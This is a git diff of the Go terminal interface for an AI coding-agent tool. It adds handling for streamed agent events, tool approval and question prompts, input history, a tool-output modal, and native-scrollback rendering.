--- /dev/null
+++ b/internal/tui/agent_events.go
@@ -0,0 +1,244 @@
+package tui
+
+import (
+	"fmt"
+	"strings"
+
+	tea "github.com/charmbracelet/bubbletea"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+)
+
+func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
+	switch event.Type {
+	case agent.EventTextDelta:
+		if a.currentAssistantIdx >= 0 && a.currentAssistantIdx < len(a.messages) {
+			a.assistantRaw[a.currentAssistantIdx] += event.TextDelta
+		} else {
+			a.currentAssistantIdx = len(a.messages)
+			a.assistantRaw[a.currentAssistantIdx] = event.TextDelta
+			// placeholder; actual display is built in updateViewportContent
+			a.messages = append(a.messages, "")
+		}
+		a.assistantDirty[a.currentAssistantIdx] = true
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventThinkDelta:
+		if a.currentThinkIdx >= 0 && a.currentThinkIdx < len(a.messages) {
+			a.messages[a.currentThinkIdx] += event.ThinkDelta
+		} else {
+			a.currentThinkIdx = len(a.messages)
+			a.messages = append(a.messages, thinkStyle.Render("think: ")+event.ThinkDelta)
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventTurnStart:
+		// Reserve display slots before streaming deltas arrive so later tool output
+		// cannot shift the assistant message index underneath us.
+		a.currentAssistantIdx = len(a.messages)
+		a.assistantRaw[a.currentAssistantIdx] = ""
+		a.messages = append(a.messages, "")
+		return a.listenAgentEvents()
+
+	case agent.EventToolCall:
+		if event.ToolCall != nil {
+			a.commitActiveStream()
+			// Store tool args for later display
+			msgIdx := len(a.messages) // Will be the index after append
+			a.toolResults = append(a.toolResults, toolResult{
+				toolCallID: event.ToolCall.ID,
+				toolName:   event.ToolCall.Name,
+				toolArgs:   event.ToolArgs,
+				msgIndex:   msgIdx,
+			})
+			a.messages = append(a.messages, "")
+			a.printHistory(a.renderMessageAt(msgIdx))
+		}
+		return a.listenAgentEvents()
+
+	case agent.EventToolResult:
+		// Find the matching tool result entry and update it
+		foundIdx := -1
+		for j := len(a.toolResults) - 1; j >= 0; j-- {
+			if a.toolResults[j].toolCallID == event.ToolCallID {
+				foundIdx = j
+				a.toolResults[j].fullContent = event.ToolResult
+				a.toolResults[j].diff = event.ToolDiff
+
+				// Create summary based on tool type
+				switch event.ToolName {
+				case "bash":
+					a.toolResults[j].summary = compactBashOutput(event.ToolResult)
+				case "read":
+					lines := strings.Split(event.ToolResult, "\n")
+					a.toolResults[j].summary = fmt.Sprintf("%d lines", len(lines))
+				case "write":
+					if summary := summarizeFileDiff(event.ToolDiff); summary != "" {
+						a.toolResults[j].summary = summary
+					} else {
+						a.toolResults[j].summary = summarizeWriteToolResult(event.ToolResult)
+					}
+				case "edit":
+					if summary := summarizeFileDiff(event.ToolDiff); summary != "" {
+						a.toolResults[j].summary = summary
+					} else {
+						a.toolResults[j].summary = "Applied"
+					}
+				default:
+					a.toolResults[j].summary = truncate(event.ToolResult, 50)
+				}
+				break
+			}
+		}
+
+		// Update the message at the stored index
+		if foundIdx >= 0 {
+			idx := a.toolResults[foundIdx].msgIndex
+			if idx >= 0 && idx < len(a.messages) {
+				a.messages[idx] = ""
+				a.printHistory(a.renderMessageAt(idx))
+			}
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventPlanUpdate:
+		a.currentPlan = event.Plan
+		a.addMessage(statusStyle.Render(formatPlanForDisplay(event.Plan)))
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventToolApprovalRequest:
+		a.commitActiveStream()
+		// Queue the approval request
+		a.approvalQueue = append(a.approvalQueue, pendingApproval{
+			approvalID: event.ApprovalID,
+			toolName:   event.ApprovalTool,
+			args:       event.ApprovalArgs,
+		})
+		// If not currently waiting, show the next one
+		if !a.waitingForApproval {
+			a.showNextApproval()
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventQuestionRequest:
+		a.commitActiveStream()
+		// Queue the question request
+		a.questionQueue = append(a.questionQueue, pendingQuestion{
+			questionID: event.QuestionID,
+			question:   event.QuestionText,
+			options:    event.QuestionOptions,
+			context:    event.QuestionContext,
+		})
+		// If not currently waiting for a question, show the next one
+		if !a.waitingForQuestion {
+			a.showNextQuestion()
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventTurnEnd:
+		if event.ContextUsage != nil {
+			a.contextUsage = event.ContextUsage
+		}
+		if a.currentThinkIdx >= 0 {
+			a.printMessageOnce(a.currentThinkIdx)
+		}
+		if a.currentAssistantIdx >= 0 {
+			a.printMessageOnce(a.currentAssistantIdx)
+		}
+		a.currentAssistantIdx = -1
+		a.currentThinkIdx = -1
+		a.updateViewportContent()
+		return a.listenAgentEvents()
+
+	case agent.EventDone:
+		if a.multiAgent && a.agentMgr != nil && a.agent != nil {
+			a.agentMgr.Finish(a.agent.ID(), nil)
+		}
+		a.isThinking = false
+		a.finishRequestTimer()
+		if event.ContextUsage != nil {
+			a.contextUsage = event.ContextUsage
+		}
+		if a.currentThinkIdx >= 0 {
+			a.printMessageOnce(a.currentThinkIdx)
+		}
+		if a.currentAssistantIdx >= 0 {
+			a.printMessageOnce(a.currentAssistantIdx)
+		}
+		a.currentAssistantIdx = -1
+		a.currentThinkIdx = -1
+		a.updateViewportContent()
+		return tea.Batch(a.timer.Stop(), a.listenAgentEvents())
+
+	case agent.EventError:
+		if a.multiAgent && a.agentMgr != nil && a.agent != nil {
+			a.agentMgr.Finish(a.agent.ID(), event.Error)
+		}
+		a.isThinking = false
+		a.finishRequestTimer()
+		if event.Error != nil {
+			a.addMessage(errorStyle.Render("Error: ") + event.Error.Error())
+		}
+		a.currentAssistantIdx = -1
+		a.currentThinkIdx = -1
+		a.updateViewportContent()
+		return tea.Batch(a.timer.Stop(), a.listenAgentEvents())
+
+	case agent.EventUsage:
+		if event.ContextUsage != nil {
+			a.contextUsage = event.ContextUsage
+		}
+		if event.Usage != nil {
+			// Accumulate cache stats
+			a.totalInputTokens += event.Usage.TotalInputTokens()
+			a.totalCacheRead += event.Usage.CacheRead
+			a.totalCacheWrite += event.Usage.CacheWrite
+
+			// Per-turn cache info
+			cacheInfo := ""
+			if info := event.Usage.CacheInfo(); info != "" {
+				cacheInfo = " | " + info
+			}
+			costStr := fmt.Sprintf("Tokens: %d↓/%d↑ $%.4f%s",
+				event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
+			a.addMessage(statusStyle.Render(costStr))
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
+	case agent.EventCompactionStart:
+		a.addMessage(statusStyle.Render("⏳ Compacting context..."))
+		return a.listenAgentEvents()
+
+	case agent.EventCompactionEnd:
+		if event.Error != nil {
+			a.addMessage(errorStyle.Render("Compaction failed: ") + event.Error.Error())
+		} else if event.StatusMessage != "" {
+			a.addMessage(statusStyle.Render("✅ " + event.StatusMessage))
+		} else {
+			a.addMessage(statusStyle.Render("✅ Context compacted"))
+		}
+		return a.listenAgentEvents()
+
+	case agent.EventStatus:
+		if event.StatusMessage != "" {
+			a.addMessage(statusStyle.Render(event.StatusMessage))
+		}
+		return a.listenAgentEvents()
+
+	case agent.EventMessageStart:
+		if event.Message.Role == "user" && event.Message.Content != "" {
+			a.addMessage(userStyle.Render("You: ") + event.Message.Content)
+		}
+		return a.listenAgentEvents()
+
+	default:
+		return a.listenAgentEvents()
+	}
+}
diff --git a/internal/tui/app.go b/internal/tui/app.go
index fd1c1d8..e0c5504 100644
--- a/internal/tui/app.go
+++ b/internal/tui/app.go
@@ -1,25 +1,22 @@
 package tui
 
 import (
-	"context"
-	"encoding/json"
 	"fmt"
-	"os"
-	"path/filepath"
 	"strings"
 	"sync"
 	"time"
 
+	"github.com/charmbracelet/bubbles/stopwatch"
 	"github.com/charmbracelet/bubbles/textinput"
-	"github.com/charmbracelet/bubbles/viewport"
 	tea "github.com/charmbracelet/bubbletea"
 	"github.com/charmbracelet/glamour"
 	"github.com/charmbracelet/lipgloss"
-	"github.com/charmbracelet/x/cellbuf"
 
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
 	"github.com/startvibecoding/vibecoding/internal/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/cron"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/session"
 	"github.com/startvibecoding/vibecoding/internal/skills"
@@ -38,6 +35,11 @@ var (
 			Foreground(lipgloss.Color("243")).
 			Italic(true)
 
+	toolModalStyle = lipgloss.NewStyle().
+			Border(lipgloss.RoundedBorder()).
+			BorderForeground(lipgloss.Color("63")).
+			Padding(0, 1)
+
 	errorStyle = lipgloss.NewStyle().
 			Foreground(lipgloss.Color("196")).
 			Bold(true)
@@ -76,7 +78,8 @@ type toolResult struct {
 	toolArgs    map[string]any // Tool call arguments
 	summary     string         // Short summary for collapsed view
 	fullContent string         // Full content for expanded view
-	msgIndex    int            // Index in a.messages where this tool message lives
+	diff        *tools.FileDiff
+	msgIndex    int // Index in a.messages where this tool message lives
 }
 
 // App is the main TUI application.
@@ -96,8 +99,8 @@ type App struct {
 	activeSkills     map[string]string // skill name -> skill context string
 
 	// UI Components
-	viewport viewport.Model
-	input    textinput.Model
+	input textinput.Model
+	timer stopwatch.Model
 
 	// State
 	messages    []string
@@ -108,7 +111,6 @@ type App struct {
 	width       int
 	height      int
 	ready       bool
-	autoScroll  bool
 
 	// Paste markers storage
 	pasteCounter int
@@ -121,17 +123,23 @@ type App struct {
 	inputBatchSize int
 	inputDelay     time.Duration
 
-	// Full content for native scrollbar support
-	fullContent string
+	// Live content stays in the managed Bubble Tea view while it is streaming.
+	// Completed transcript entries are printed through Bubble Tea's unmanaged
+	// print path so the terminal's native scrollback owns history.
+	liveContent   string
+	pendingPrints []string
 
 	// Initial message to display
 	initialMessage string
 
-	// Tool output expansion
-	toolOutputExpanded bool
+	// Tool output modal
+	toolModalOpen         bool
+	toolModalOffset       int
+	toolModalPinnedBottom bool
 
 	// Context usage
 	contextUsage *ctxpkg.ContextUsage
+	currentPlan  *tools.TaskPlan
 
 	// Cache usage tracking (cumulative)
 	totalInputTokens int
@@ -140,10 +148,19 @@ type App struct {
 
 	// Spinner state
 	spinnerIndex int
+	requestStart time.Time
+	lastDuration time.Duration
 
 	// Session history
-	sessionMu     sync.Mutex
-	historyLoaded bool
+	sessionMu          sync.Mutex
+	historyLoaded      bool
+	agentHistoryLoaded bool
+
+	// Prompt input history
+	inputHistory         []string
+	inputHistoryBrowsing bool
+	inputHistoryIndex    int
+	inputHistoryDraft    string
 
 	// Render throttling
 	lastRender     time.Time
@@ -156,9 +173,24 @@ type App struct {
 	pendingApprovalID  string
 	approvalQueue      []pendingApproval
 
+	// Question state
+	waitingForQuestion bool
+	pendingQuestionID  string
+	questionQueue      []pendingQuestion
+
+	// Multi-agent state (Decision 8: default off)
+	multiAgent  bool
+	activeAgent agentpkg.AgentID
+	agentMgr    *agent.AgentManager
+
+	// Cron state
+	cronStore cron.CronStore
+	scheduler *cron.Scheduler
+
 	// Current streaming message indices (-1 = none)
 	currentAssistantIdx int
 	currentThinkIdx     int
+	printedMessageIdx   map[int]bool
 
 	// Markdown rendering for assistant messages
 	mdRenderer        *glamour.TermRenderer
@@ -177,15 +209,21 @@ type pendingApproval struct {
 	args       map[string]any
 }
 
+// pendingQuestion holds a queued question request.
+type pendingQuestion struct {
+	questionID string
+	question   string
+	options    []string
+	context    string
+}
+
 // NewApp creates a new TUI application.
-func NewApp(p provider.Provider, model *provider.Model, settings *config.Settings, sess *session.Manager, registry *tools.Registry, sandboxInfo string, extraContext string, skillsMgr *skills.Manager, initialMode string) *App {
+func NewApp(p provider.Provider, model *provider.Model, settings *config.Settings, sess *session.Manager, registry *tools.Registry, sandboxInfo string, extraContext string, skillsMgr *skills.Manager, initialMode string, multiAgent bool, agentMgr *agent.AgentManager, cronStore cron.CronStore, scheduler *cron.Scheduler) *App {
 	input := textinput.New()
 	input.Placeholder = "Type a message..."
 	input.Focus()
 	input.CharLimit = 0
 
-	vp := viewport.New(80, 20)
-
 	// Determine initial mode: use provided mode, fall back to settings default
 	mode := initialMode
 	if mode == "" {
@@ -208,8 +246,7 @@ func NewApp(p provider.Provider, model *provider.Model, settings *config.Setting
 		activeSkills:        make(map[string]string),
 		skillsMgr:           skillsMgr,
 		input:               input,
-		viewport:            vp,
-		autoScroll:          true,
+		timer:               stopwatch.NewWithInterval(time.Second),
 		pastes:              make(map[int]string),
 		inputQueue:          make([]InputEvent, 0, 100),
 		inputBatchSize:      10,
@@ -217,15 +254,17 @@ func NewApp(p provider.Provider, model *provider.Model, settings *config.Setting
 		renderInterval:      16 * time.Millisecond, // ~60fps
 		currentAssistantIdx: -1,
 		currentThinkIdx:     -1,
+		printedMessageIdx:   make(map[int]bool),
 		assistantRaw:        make(map[int]string),
 		assistantRendered:   make(map[int]string),
 		assistantDirty:      make(map[int]bool),
+		multiAgent:          multiAgent,
+		agentMgr:            agentMgr,
+		cronStore:           cronStore,
+		scheduler:           scheduler,
 	}
 
-	// Initialize markdown renderer (best-effort; may fail in test/headless env)
-	if r, err := glamour.NewTermRenderer(glamour.WithAutoStyle()); err == nil {
-		app.mdRenderer = r
-	}
+	app.configureMarkdownRenderer()
 
 	return app
 }
@@ -282,15 +321,20 @@ func (a *App) LoadHistoryMessages() {
 
 // Init implements tea.Model.
 func (a *App) Init() tea.Cmd {
+	var cmds []tea.Cmd
+
 	// Show initial message if set
 	if a.initialMessage != "" {
 		a.messages = append(a.messages, statusStyle.Render(a.initialMessage))
+		a.printHistory(a.messages[len(a.messages)-1])
 	}
 
 	// Load history messages from session
 	a.LoadHistoryMessages()
+	a.updateViewportContent()
 
-	return tea.Batch(textinput.Blink, a.processInputQueue())
+	cmds = append(cmds, a.flushPendingPrints(), textinput.Blink, a.processInputQueue())
+	return tea.Batch(cmds...)
 }
 
 // processInputQueue returns a command that processes queued input events
@@ -324,20 +368,16 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 
 	switch msg := msg.(type) {
 	case tea.WindowSizeMsg:
+		oldWidth := a.width
 		a.width = msg.Width
 		a.height = msg.Height
 		a.ready = true
 
-		// Calculate heights: input (1 line) + footer (1 line) + some padding
-		heightUsed := 3 // input + footer + padding
-		chatHeight := msg.Height - heightUsed
-		if chatHeight < 3 {
-			chatHeight = 3
-		}
-
-		a.viewport.Width = msg.Width
-		a.viewport.Height = chatHeight
 		a.input.Width = msg.Width - 4
+		if oldWidth != a.width {
+			a.configureMarkdownRenderer()
+			a.markAssistantRenderedDirty()
+		}
 
 		a.updateViewportContent()
 		return a, nil
@@ -358,36 +398,77 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 		}
 		return a, tea.Batch(cmds...)
 
+	case stopwatch.TickMsg, stopwatch.StartStopMsg, stopwatch.ResetMsg:
+		var timerCmd tea.Cmd
+		a.timer, timerCmd = a.timer.Update(msg)
+		if timerCmd != nil {
+			cmds = append(cmds, timerCmd)
+		}
+		return a, tea.Batch(cmds...)
+
 	case renderRequestMsg:
 		a.updateViewportContent()
 		return a, nil
 
 	case tea.KeyMsg:
-		// Queue the key event
-		a.queueInput(msg)
+		if a.toolModalOpen {
+			switch {
+			case msg.Type == tea.KeyEsc || msg.Type == tea.KeyCtrlO || (msg.Type == tea.KeyRunes && string(msg.Runes) == "q"):
+				a.closeToolModal()
+				return a, nil
+			case msg.Type == tea.KeyUp:
+				a.scrollToolModal(-1)
+				return a, nil
+			case msg.Type == tea.KeyDown:
+				a.scrollToolModal(1)
+				return a, nil
+			case msg.Type == tea.KeyPgUp:
+				a.scrollToolModal(-a.toolModalPageSize())
+				return a, nil
+			case msg.Type == tea.KeyPgDown:
+				a.scrollToolModal(a.toolModalPageSize())
+				return a, nil
+			case msg.Type == tea.KeyHome:
+				a.toolModalOffset = 0
+				a.toolModalPinnedBottom = false
+				return a, nil
+			case msg.Type == tea.KeyEnd:
+				a.toolModalOffset = a.maxToolModalOffset()
+				a.toolModalPinnedBottom = true
+				return a, nil
+			}
+			return a, nil
+		}
 
-		// For special keys, process immediately
-		switch msg.String() {
-		case "ctrl+c":
+		// Special keys are processed immediately; regular text input is batched.
+		switch msg.Type {
+		case tea.KeyCtrlC:
 			return a, tea.Quit
-		case "esc":
-			if a.isThinking {
+		case tea.KeyEsc:
+			if a.isThinking || a.waitingForApproval || a.waitingForQuestion {
 				if a.agent != nil {
 					a.agent.Abort()
 					a.agent = nil // Reset agent so next request creates a fresh one with new abort channel
+					a.agentHistoryLoaded = false
 				}
+				a.clearApprovalState()
+				a.clearQuestionState()
 				a.inputQueueMu.Lock()
 				a.inputQueue = a.inputQueue[:0]
 				a.lastInputTime = time.Time{}
 				a.inputQueueMu.Unlock()
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
 				a.isThinking = false
+				a.finishRequestTimer()
 				a.addMessage(statusStyle.Render("⏹ Aborted"))
+				return a, a.timer.Stop()
 			} else {
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
 			}
 			return a, nil
-		case "enter":
+		case tea.KeyEnter:
 			// Process enter immediately
 			a.flushInputQueue()
 			input := strings.TrimSpace(a.input.Value())
@@ -411,41 +492,76 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 					a.pendingApprovalID = ""
 				}
 				a.input.Reset()
+				a.resetInputHistoryNavigation()
+				a.scheduleRender()
+				return a, nil
+			}
+
+			// Check if waiting for a question
+			if a.waitingForQuestion {
+				if a.agent != nil {
+					answer := strings.TrimSpace(input)
+					// Check if it's a number selection
+					var num int
+					if _, err := fmt.Sscanf(answer, "%d", &num); err == nil && num > 0 {
+						// Find the question to resolve options
+						// Options are already shown; just pass the number as the answer
+						a.agent.HandleQuestionResponse(a.pendingQuestionID, answer)
+						a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Selected: [%s]", answer)))
+					} else if answer != "" {
+						// Custom text input
+						a.agent.HandleQuestionResponse(a.pendingQuestionID, answer)
+						a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Answer: %s", answer)))
+					} else {
+						// Empty input — re-prompt
+						a.input.Reset()
+						a.resetInputHistoryNavigation()
+						a.scheduleRender()
+						return a, nil
+					}
+				}
+				// Show next queued question or clear waiting state
+				if len(a.questionQueue) > 0 {
+					a.showNextQuestion()
+				} else {
+					a.waitingForQuestion = false
+					a.pendingQuestionID = ""
+				}
+				a.input.Reset()
+				a.resetInputHistoryNavigation()
 				a.scheduleRender()
 				return a, nil
 			}
 
 			if input != "" {
 				a.input.Reset()
+				a.recordInputHistory(input)
 				expandedInput := a.expandPasteMarkers(input)
 				return a, a.processInput(expandedInput)
 			}
 			return a, nil
-		case "tab":
+		case tea.KeyTab:
 			a.cycleMode()
 			return a, nil
-		case "pgup":
-			a.viewport.HalfViewUp()
-			a.autoScroll = false
-			return a, nil
-		case "pgdown":
-			a.viewport.HalfViewDown()
-			if a.viewport.AtBottom() {
-				a.autoScroll = true
-			}
+		case tea.KeyPgUp:
 			return a, nil
-		case "home":
-			a.viewport.GotoTop()
-			a.autoScroll = false
+		case tea.KeyPgDown:
 			return a, nil
-		case "end":
-			a.viewport.GotoBottom()
-			a.autoScroll = true
+		case tea.KeyUp:
+			a.flushInputQueue()
+			if a.navigateInputHistory(-1) {
+				return a, nil
+			}
+		case tea.KeyDown:
+			a.flushInputQueue()
+			if a.navigateInputHistory(1) {
+				return a, nil
+			}
+		case tea.KeyCtrlO:
+			a.openLatestToolModal()
 			return a, nil
-		case "ctrl+o":
-			// Toggle tool output expansion
-			a.toolOutputExpanded = !a.toolOutputExpanded
-			a.updateViewportContent()
+		case tea.KeyCtrlP:
+			a.toggleMultiAgent()
 			return a, nil
 		}
 
@@ -458,36 +574,37 @@ func (a *App) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
 			}
 		}
 
+		a.queueInput(msg)
+		a.resetInputHistoryNavigation()
 		return a, nil
 
 	case agentStartMsg:
 		a.isThinking = true
 		a.spinnerIndex = 0
+		a.requestStart = time.Now()
+		a.lastDuration = 0
 		a.addMessage(userStyle.Render("You: ") + msg.input)
-		return a, tea.Batch(listenEvents(a.eventCh), a.tickSpinner())
+		return a, tea.Batch(a.listenAgentEvents(), a.tickSpinner(), a.timer.Reset(), a.timer.Start())
 
 	case agentEventMsg:
 		return a, a.handleAgentEvent(msg.event)
 
 	case agentDoneMsg:
 		a.isThinking = false
+		a.finishRequestTimer()
 		if msg.err != nil {
 			a.addMessage(errorStyle.Render("Error: ") + msg.err.Error())
 		}
-		return a, nil
+		return a, a.timer.Stop()
 	}
 
 	// Update components
-	var inputCmd, vpCmd tea.Cmd
+	var inputCmd tea.Cmd
 	a.input, inputCmd = a.input.Update(msg)
-	a.viewport, vpCmd = a.viewport.Update(msg)
 
 	if inputCmd != nil {
 		cmds = append(cmds, inputCmd)
 	}
-	if vpCmd != nil {
-		cmds = append(cmds, vpCmd)
-	}
 
 	return a, tea.Batch(cmds...)
 }
@@ -581,13 +698,18 @@ func (a *App) View() string {
 	}
 
 	footer := a.renderFooter()
+	if a.toolModalOpen {
+		return lipgloss.JoinVertical(lipgloss.Left, a.renderToolModal(), footer)
+	}
 
-	return lipgloss.JoinVertical(
-		lipgloss.Left,
-		a.viewport.View(),
-		a.input.View(),
-		footer,
-	)
+	parts := []string{a.input.View(), footer}
+	if a.liveContent != "" {
+		parts = append([]string{a.clampedLiveContent(footer)}, parts...)
+	}
+	if planPanel := a.renderPlanPanel(); planPanel != "" {
+		parts = append([]string{planPanel}, parts...)
+	}
+	return lipgloss.JoinVertical(lipgloss.Left, parts...)
 }
 
 // handlePaste handles large pastes by creating markers
@@ -659,1071 +781,80 @@ func (a *App) expandPasteMarkers(text string) string {
 }
 
 func (a *App) updateViewportContent() {
-	// Rebuild messages based on expansion state
-	var displayMessages []string
-
-	// Build a set of message indices that are tool results
-	toolMsgIndices := make(map[int]int) // msgIndex -> toolResults index
-	for i, tr := range a.toolResults {
-		toolMsgIndices[tr.msgIndex] = i
-	}
-
-	for idx, msg := range a.messages {
-		if trIdx, ok := toolMsgIndices[idx]; ok {
-			result := a.toolResults[trIdx]
-			if a.toolOutputExpanded {
-				// Show full content with arguments
-				var content string
-				if result.toolArgs != nil {
-					argsStr := formatToolArgs(result.toolName, result.toolArgs)
-					if result.fullContent != "" {
-						content = fmt.Sprintf("🔧 [%s]\n%s\n---\n%s", result.toolName, argsStr, result.fullContent)
-					} else {
-						content = fmt.Sprintf("🔧 [%s]\n%s", result.toolName, argsStr)
-					}
-				} else if result.fullContent != "" {
-					content = fmt.Sprintf("🔧 [%s]\n%s", result.toolName, result.fullContent)
-				} else {
-					content = fmt.Sprintf("🔧 [%s]", result.toolName)
-				}
-				displayMessages = append(displayMessages, toolStyle.Render(content))
-			} else {
-				// Show summary
-				displayMessages = append(displayMessages, toolStyle.Render(fmt.Sprintf("🔧 [%s] %s", result.toolName, result.summary)))
-			}
-		} else if raw, ok := a.assistantRaw[idx]; ok {
-			// Assistant message: render markdown if renderer is available
-			if raw == "" {
-				continue
+	a.liveContent = ""
+	if a.currentThinkIdx >= 0 && a.currentThinkIdx < len(a.messages) {
+		a.liveContent = a.messages[a.currentThinkIdx]
+	}
+	if a.currentAssistantIdx >= 0 {
+		assistant := a.renderLiveAssistantMessage(a.currentAssistantIdx)
+		if assistant != "" {
+			if a.liveContent != "" {
+				a.liveContent += "\n\n"
 			}
-			if a.assistantDirty[idx] && a.mdRenderer != nil {
-				rendered, err := a.mdRenderer.Render(raw)
-				if err == nil {
-					a.assistantRendered[idx] = rendered
-				}
-				a.assistantDirty[idx] = false
-			}
-			prefix := assistantStyle.Render("Assistant: ")
-			if rendered, ok := a.assistantRendered[idx]; ok && rendered != "" {
-				displayMessages = append(displayMessages, prefix+rendered)
-			} else {
-				displayMessages = append(displayMessages, prefix+raw)
-			}
-		} else {
-			displayMessages = append(displayMessages, msg)
+			a.liveContent += assistant
 		}
 	}
-
-	a.fullContent = strings.Join(displayMessages, "\n\n")
-	a.viewport.SetContent(a.wrapContent(a.fullContent))
-	if a.autoScroll {
-		a.viewport.GotoBottom()
-	}
 }
 
-// wrapContent wraps content to fit within the viewport width.
-// This ensures logical lines in the viewport match visual lines after wrapping.
-func (a *App) wrapContent(content string) string {
-	if a.width <= 0 {
-		return content
-	}
-	lines := strings.Split(content, "\n")
-	wrapped := make([]string, 0, len(lines))
-	for _, line := range lines {
-		wrapped = append(wrapped, cellbuf.Wrap(line, a.width, ""))
+func (a *App) configureMarkdownRenderer() {
+	width := a.assistantMarkdownWidth()
+	if r, err := glamour.NewTermRenderer(
+		glamour.WithStandardStyle("dark"),
+		glamour.WithWordWrap(width),
+	); err == nil {
+		a.mdRenderer = r
 	}
-	return strings.Join(wrapped, "\n")
 }
 
-// formatToolArgs formats tool arguments for display
-func formatToolArgs(toolName string, args map[string]any) string {
-	var parts []string
-
-	switch toolName {
-	case "write":
-		// Show path and content for write tool
-		if path, ok := args["path"]; ok {
-			parts = append(parts, fmt.Sprintf("path: %v", path))
-		}
-		if content, ok := args["content"]; ok {
-			contentStr := fmt.Sprintf("%v", content)
-			// Truncate content if too long
-			if len(contentStr) > 500 {
-				contentStr = contentStr[:500] + "..."
-			}
-			parts = append(parts, fmt.Sprintf("content:\n%s", contentStr))
-		}
-	case "edit":
-		// Show path and edits for edit tool
-		if path, ok := args["path"]; ok {
-			parts = append(parts, fmt.Sprintf("path: %v", path))
-		}
-		if editList, ok := args["edits"]; ok {
-			if arr, ok := editList.([]any); ok {
-				for idx, e := range arr {
-					if m, ok := e.(map[string]any); ok {
-						oldT, _ := m["oldText"].(string)
-						newT, _ := m["newText"].(string)
-						if len(oldT) > 100 {
-							oldT = oldT[:100] + "..."
-						}
-						if len(newT) > 100 {
-							newT = newT[:100] + "..."
-						}
-						parts = append(parts, fmt.Sprintf("edit[%d]:\n  old: %s\n  new: %s", idx+1, oldT, newT))
-					}
-				}
-			}
-		}
-	case "read":
-		if path, ok := args["path"]; ok {
-			parts = append(parts, fmt.Sprintf("path: %v", path))
-		}
-	case "bash":
-		if cmd, ok := args["command"]; ok {
-			parts = append(parts, fmt.Sprintf("command: %v", cmd))
-		}
-	default:
-		// Show all arguments for other tools
-		for k, v := range args {
-			vStr := fmt.Sprintf("%v", v)
-			if len(vStr) > 100 {
-				vStr = vStr[:100] + "..."
-			}
-			parts = append(parts, fmt.Sprintf("%s: %s", k, vStr))
-		}
-	}
-
-	return strings.Join(parts, "\n")
-}
-
-// formatCachePercent calculates and returns the cache hit rate string, or empty string if no data.
-// The denominator uses the full input footprint so OpenAI and Anthropic can share the same
-// cache ratio display after their provider-specific usage fields are normalized.
-func (a *App) formatCachePercent() string {
-	switch {
-	case a.totalInputTokens > 0:
-		pct := float64(a.totalCacheRead) / float64(a.totalInputTokens) * 100
-		if pct > 100 {
-			pct = 100
-		}
-		return fmt.Sprintf("Cache: %.0f%%", pct)
-	case a.totalCacheRead > 0:
-		return fmt.Sprintf("CacheRead: %d", a.totalCacheRead)
-	case a.totalCacheWrite > 0:
-		return fmt.Sprintf("CacheWrite: %d", a.totalCacheWrite)
-	default:
-		return ""
-	}
-}
-
-func formatTokens(count int) string {
-	if count < 1000 {
-		return fmt.Sprintf("%d", count)
-	}
-	if count < 10000 {
-		return fmt.Sprintf("%.1fk", float64(count)/1000)
-	}
-	if count < 1000000 {
-		return fmt.Sprintf("%dk", count/1000)
+func (a *App) assistantMarkdownWidth() int {
+	width := a.width
+	if width <= 0 {
+		width = 80
 	}
-	if count < 10000000 {
-		return fmt.Sprintf("%.1fM", float64(count)/1000000)
+	width -= lipgloss.Width("Assistant: ")
+	if width < 20 {
+		return 20
 	}
-	return fmt.Sprintf("%dM", count/1000000)
+	return width
 }
 
-func (a *App) renderFooter() string {
-	modelName := "unknown"
-	if a.model != nil {
-		modelName = a.model.Name
+func (a *App) liveContentHeight(footer string) int {
+	height := a.height
+	if height <= 0 {
+		return 0
 	}
-
-	var modeStr string
-	switch a.mode {
-	case "plan":
-		modeStr = "🗒 PLAN"
-	case "agent":
-		modeStr = "🔧 AGENT"
-	case "yolo":
-		modeStr = "🚀 YOLO"
-	default:
-		modeStr = strings.ToUpper(a.mode)
-	}
-
-	cwd := "."
-	if a.session != nil && a.session.GetHeader() != nil {
-		cwd = a.session.GetHeader().Cwd
-	}
-	if len(cwd) > 30 {
-		cwd = "..." + cwd[len(cwd)-27:]
-	}
-
-	// Build context usage string with color coding
-	contextStr := ""
-	if a.contextUsage != nil && a.contextUsage.ContextWindow > 0 {
-		if a.contextUsage.Percent != nil {
-			percent := *a.contextUsage.Percent
-			contextDisplay := fmt.Sprintf("%.1f%%/%s",
-				percent,
-				formatTokens(a.contextUsage.ContextWindow))
-			// Colorize based on usage
-			if percent > 90 {
-				contextStr = " | " + errorStyle.Render(contextDisplay)
-			} else if percent > 70 {
-				contextStr = " | " + userStyle.Render(contextDisplay)
-			} else {
-				contextStr = " | " + contextDisplay
-			}
-		} else {
-			contextStr = fmt.Sprintf(" | ?/%s", formatTokens(a.contextUsage.ContextWindow))
-		}
+	used := lipgloss.Height(a.input.View()) + lipgloss.Height(footer)
+	if panel := a.renderPlanPanel(); panel != "" {
+		used += lipgloss.Height(panel)
 	}
-
-	// Build cache hit rate string, highlighting when hit rate >= 50%
-	cacheStr := ""
-	if cachePercentStr := a.formatCachePercent(); cachePercentStr != "" {
-		if a.totalInputTokens > 0 && float64(a.totalCacheRead)/float64(a.totalInputTokens)*100 >= 50 {
-			cacheStr = " | " + statusStyle.Render(cachePercentStr)
